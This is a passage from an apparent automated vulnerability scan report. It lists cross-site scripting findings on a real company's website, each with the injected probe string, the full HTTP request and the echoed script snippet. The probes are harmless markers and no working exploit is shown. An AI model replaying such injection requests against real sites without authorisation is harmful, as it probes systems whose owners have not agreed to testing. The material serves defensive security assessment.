Path:   /about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3160e"%3b7113b4969d4 was submitted in the REST URL parameter 2. This input was echoed as 3160e";7113b4969d4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news3160e"%3b7113b4969d4/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47347
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news3160e";7113b4969d4/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";
...[SNIP]...

1.414. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57aad'%3b29a1793f5e5 was submitted in the REST URL parameter 2. This input was echoed as 57aad';29a1793f5e5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news57aad'%3b29a1793f5e5/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47347
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news57aad';29a1793f5e5/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/
...[SNIP]...

1.415. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6d6a"%3b7a5cfc53ed6 was submitted in the REST URL parameter 3. This input was echoed as c6d6a";7a5cfc53ed6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/c6d6a"%3b7a5cfc53ed6 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:06 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/c6d6a";7a5cfc53ed6";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.416. http://www.verizonbusiness.com/about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25638-en-National+Grid+Charges+Verizon+Business+With+Transformation+of+Electricity+and+Gas+Company's+Global+Communications+Environment.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c7ac'%3b0587a951e92 was submitted in the REST URL parameter 3. This input was echoed as 8c7ac';0587a951e92 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/8c7ac'%3b0587a951e92 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:51:44 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/8c7ac';0587a951e92'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.417. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9ee3'%3b471c41df3eb was submitted in the REST URL parameter 1. This input was echoed as c9ee3';471c41df3eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutc9ee3'%3b471c41df3eb/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:50 GMT
Content-Type: text/html
Content-Length: 40830
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/aboutc9ee3';471c41df3eb/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();

...[SNIP]...

1.418. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7080e"%3b6baa27dd355 was submitted in the REST URL parameter 1. This input was echoed as 7080e";6baa27dd355 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about7080e"%3b6baa27dd355/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:49:35 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40828
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about7080e";6baa27dd355/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEG
...[SNIP]...

1.419. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75000"%3b428c04d0e31 was submitted in the REST URL parameter 2. This input was echoed as 75000";428c04d0e31 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news75000"%3b428c04d0e31/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:05 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47289
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news75000";428c04d0e31/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY


...[SNIP]...

1.420. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6df4'%3b9c92eac496b was submitted in the REST URL parameter 2. This input was echoed as a6df4';9c92eac496b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsa6df4'%3b9c92eac496b/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:50:23 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 47289
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/newsa6df4';9c92eac496b/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i
...[SNIP]...

1.421. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3146a"%3bb8d31905349 was submitted in the REST URL parameter 3. This input was echoed as 3146a";b8d31905349 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/3146a"%3bb8d31905349 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:50:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49711
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:50:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:50:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/3146a";b8d31905349";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.422. http://www.verizonbusiness.com/about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25639-en-IDC+MarketScape+Recognizes+Verizon+Business+as+a+Leader+in+Asia+Pacific+Telecommunications+Market.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94da5'%3b3530f120cba was submitted in the REST URL parameter 3. This input was echoed as 94da5';3530f120cba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/94da5'%3b3530f120cba HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:13 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49713
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:51:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/about/news/94da5';3530f120cba'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.423. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81d51'%3b2f51d0ef285 was submitted in the REST URL parameter 1. This input was echoed as 81d51';2f51d0ef285 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about81d51'%3b2f51d0ef285/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40838
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/about81d51';2f51d0ef285/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array
...[SNIP]...

1.424. http://www.verizonbusiness.com/about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 445b6"%3b57d84659d54 was submitted in the REST URL parameter 1. This input was echoed as 445b6";57d84659d54 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about445b6"%3b57d84659d54/news/pr-25640-en-Verizon+to+Deploy+Industry+Leading+100G+Ethernet+on+Selected+Route+of+Its+European+Long+Haul+Backbone.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
